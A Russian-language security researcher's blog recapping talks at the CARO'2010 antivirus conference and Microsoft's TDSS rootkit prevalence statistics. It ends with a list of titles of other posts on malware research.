Конференция в этом году была посвящена "Большим числам" и лишь немногие доклады не попадали под эту тему. Еще интересной особенностью этой конференции является то, что не все доклады рассчитаны на широкую огласку и их презентации не будут доступны для скачивания. Таких докладов было немного и некоторые из них не содержали ничего такого, что нельзя было разгласить, но авторы решили перестраховаться. К примеру, один из таких докладов был «Anatomy of a Targeted Attack with Global consequences» , где на примере нашумевшей атаки Aurora, рассказали о возможных целенаправленных атаках. В принципе ничего нового я из доклада для себя не узнал, но презентация была хорошая, вся информация по этой атаки была хорошо структурирована.

Хорошая презентация была «Virtual Machine Protection Technology and AV Industry»но обфусцированный китайский-английский воспринимался очень сложно. Докладчик поднял вопрос о проблемах анализа виртуализованного кода и возможных подходах к решению этой проблемы.

Докладчик из G-Data рассказал о системе MonkeyWrench «Detecting malicious web pages with MonkeyWrench» для обнаружения вредоносной активности на веб-страницах. Планы у них грандиозные и они даже готовы сотрудничать и обмениваться коллекциями. Система интересная, но пока Wepawet круче. Песочница MonkeyWrench основана на принципе эмуляции работы различных браузерных платформ. В ней так же реализованы некоторые эвристические подходы к распознаванию shellcode-последовательностей.

Наверное, больше всех мне понравился доклад “Indexing Large Volumes of Binary Content for Fast Search”, речь там шла о реализации системы быстрого поиска последовательностей в бинарных файлах (PE, ELF …). Сам докладчик очень живенько рассказывал о своей системе, но кроме слов демонстрировал полученные результаты на реальной системе.

Все остальные доклады были тоже интересные, но почему –то больше всего запомнились именно вышеописанные.

Организаторами конференции этого года выступила финская антивирусная компания F-Secure и хочется отдельно поблагодарить Mikko Hyppönen за то, что он приложил много усилий, чтобы от конференции остались только положительные впечатления.

P.S.: Лишь в первый день была хорошая погода и удалось немного по фотографировать достопримечательности Хельсинки.

CARO'2010: Day2

2010-05-28T11:43:00.000+04:00

Заключительной день конференции был менее насыщенным. Хотя достойные доклады тоже были:
- "Detecting malicious web pages with MonkeyWrench"
- "Using Value Set Analysis for Classification of metamorphic Malware Samples"
В этот день ко мне доматались корейцы из компании AhLab, которые всячески пытались от меня получить информацию о внутренних тулзах :)

CARO'2010: Day1

2010-05-26T19:26:00.000+04:00

Собственно сегодня с 9:00 уже начала свою работу конференция CARO'2010. Тема этой конференции "Большие числа". Речь идет о постоянном росте кол-ва вредоносных объектов, увлечения числа сигнатур и собственно размера самих антивирусных баз. Именно об этом сегодня много говорили, да и пожалуй завтра тоже продолжат :). Интересно, что самое большое число докладчиков на конференции представляют компанию Microsoft. А еще более интересно то, что доклады у них очень даже заслуживающие внимания. Частично презентации уже выложили здесь.

Пока на этом все, подробнее о докладах напишу в итоговом посте :)

CARO'2010

2010-05-24T12:35:00.000+04:00

Завтра выдвигаюсь на конференцию CARO'2010. В этом году она проходит в Хельсинки и организаторами выступают F-Secure. Достаточно много интересных докладов в программе, по итогам обязательно отпишу и расскажу как оно вообще было.

Статистика распространенности различных версий TDSS

2010-05-04T19:41:00.000+04:00

Недавно в сети появился интересный отчет от MS о распространенности различных версий TDSS. Распространенность по версиям очевидна, самые популярные экземпляры относятся к последними модификациям этого зловреда.

Достаточное большое распространение имеют дроперы устанавливающие этого руткита в систему. Интересные данные по обнаруженным инцидентам на разных ОС семейства MS Windows:

По количеству инцидентов по прежнему лидирует платформа WinXP, что в принципе очевидно. Причем среди этих инцидентов не малая доля приходится на пользователей XP SP2, по всей видимости это пользователи пиратских версий, иначе нельзя объяснить столь длительное игнорирование напоминаний об обновлении. Ну разве, что это все пользователи Soft-Ice :)
Если говорить о региональной активности, то среди стран лидирует США, причем с громадным отрывом от остальных.

Это можно объяснить наибольшей популярностью антивирусных продуктов от MS в этом регионе, хотя в целом активность этого руткита в США очень велика.

Update: Опубликован обновленный вариант этой статистики за май. В объемах сильно подросла последняя модификация, а вот распространенность более старых версий, как и предполагалось, стремительно падает.

Fuzzing the World

Обзор книги: "The Tangled Web"

Обновление TDL4: Purple Haze all in my brain

MS12-004 в дикой природе

Carberp, Facebook и ddos.plug

Тенденции развития буткитов за прошлый год

Arts of Bootkit

Обзор книги «A Bug Hunter’s Diary»

Возвращение SpyEye

Carberp + BlackHole = рост ДБО инцидентов

Java эксплойты впереди всех по пробиву

ZeroNights: глазами докладчика

ESET на ZeroNights

Новая модификация Carberp использует буткит-функционал

HA­CKER­PRAK­TI­KUM в Бохуме

Win32/Duqu REsearch: что скрывает RPC

Как определить точную дату заражения Win32/Duqu

Win32/Olmasco: новый виток развития TDL4

Win32/Duqu: новый виток развития истории со Stuxnet

Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy

Впечатления от Ekoparty

Defeating x64: Modern Trends of Kernel-Mode Rootkits

Ekoparty и VB2011

Win32/Wapomi модифицирует прошивку BIOS

CC'11 впечатления

Chaos Constructions'2011

Техники обхода проверок цифровой подписи на x64

Насколько защищены современные браузеры?

Противодействие криминалистической экспертизе со стороны вредоносных программ

Practical C++ decompilation

Kad.dll или P2P протокол для ботнета TDL4

Наиболее распространенные эсплойт паки

Криминалистический анализ TDL4 и TdlFsReader

CONFidence'2011 (Krakow)

Впечатления от PHD

Завтра PHD

CARO'2011 in Prague

Новая модификация TDL4 обходит костыль MS Advisory (2506014)

MS Advisory (2506014) закрывает брешь для установки на x64 винде

The Evolution of TDL: Conquering x64

Positive Hack Days - must see!

Ralph Langner o PLC Payload из Stuxnet

Безопасность SCADA все больше волнует исследователей

Phoenix exploit kit 2.5 leaked

Использование связки эксплойтов

Владельцы ботнета TDL4 стали продавать инсталы на инфицированных машинах?

Пробив через Java по прежнему лидирует

MS Windows SMB "mrxsmb.sys" Remote Heap Overflow

Зевс по прежнему актуален

Снова засветился на НТВ

Эволюция client-side эксплойтов в картинках

Концепт мобильного ботнета управляемого по SMS

Уязвимость в обработке MHTML протокола (CVE-2011-0096)

Win32/Sheldor - теперь малиновый ...

Атака на антивирусные облака

Эксплойт для MS10-073 таки попал на паблик

Чтиво для вирусного аналитика

TeamViewer, как компонент бэкдора

0-day для Graphics Rendering Engine

На выходных пришло интересное спам сообщение ...

Дождались или уязвимость в Task Scheduler закрыта

Два 0-day, о которых пока молчит MS

Альтернативный GUI для Metasploit в стиле Canvas

Впечатления от поездки на AVAR'2010

SCADA и Stuxnet

AVAR'2010

SpyEye все больше привлекает внимания

Смарт-карты не панацея для ДБО

Stuxnet under the microscope (revision 1.2)

Опыт заказа книг с amazon

Malware Analyst's Cookbook

Вчера довелось прочесть лекцию в МГУ

По количеству инцидентов Java затмила Adobe

Вышла наша статейка в VB magazine за октябрь

Обновление IDA Pro до версии 6.0

Another report about Stuxnet

Unpatched 0-day's, Stuxnet and M$

Засветился на НТВ сегодня немножко :)

Stuxnet Under the Microscope

Twitpocalypsis NOW!

HACKERPRAKTIKUM в Бохуме